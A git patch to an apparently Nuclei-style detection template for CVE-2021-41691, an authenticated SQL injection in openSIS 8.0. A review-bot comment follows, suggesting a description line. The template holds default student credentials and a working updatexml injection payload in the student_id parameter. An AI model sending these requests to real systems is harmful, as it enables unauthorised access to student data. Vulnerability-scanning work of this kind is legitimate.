From 21c2c0cd2cf98cd9595611b75c3180729f46c70c Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Tue, 22 Mar 2022 13:04:29 +0530
Subject: [PATCH] lint update
---
 cves/2021/CVE-2021-41691.yaml | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)
diff --git a/cves/2021/CVE-2021-41691.yaml b/cves/2021/CVE-2021-41691.yaml
index bb7373f94d..3441b21e97 100644
--- a/cves/2021/CVE-2021-41691.yaml
+++ b/cves/2021/CVE-2021-41691.yaml
@@ -4,8 +4,7 @@ info:
 name: openSIS Student Information System 8.0 SQl Injection Vulnerability
 author: Bartu Utku SARP
 severity: high
- description: description
- reference:
+ reference:
 - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
 - https://www.exploit-db.com/exploits/50637
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
@@ -18,26 +17,30 @@ requests: Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/index.php?modfunc=logout - Connection: close - USERNAME=student&PASSWORD=student%40123&language=en&log= + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= - | POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/index.php?modfunc=logout - Connection: close student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + attack: pitchfork + payloads: + username: + - student + + password: + - student@123 + req-condition: true cookie-reuse: true matchers: - type: dsl dsl: - 'contains(body_2, "
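Review bot: In the first hunk the placeholder `description: description` is deleted rather than replaced, so the visible part of the `info` block now carries only name, author, severity and references and says nothing about what a match means. A one-line summary would help whoever triages a hit, along the lines of `description: openSIS Student Information System 8.0 is vulnerable to authenticated SQL injection via the student_id parameter of TransferredOutModal.php.`, with the parameter and path taken from the request in the second hunk. The `name` field in the same block still reads `SQl Injection`; `SQL Injection` matches how the finding is normally searched for. The `info` block continues past this hunk, so if a description already exists further down the first point does not apply.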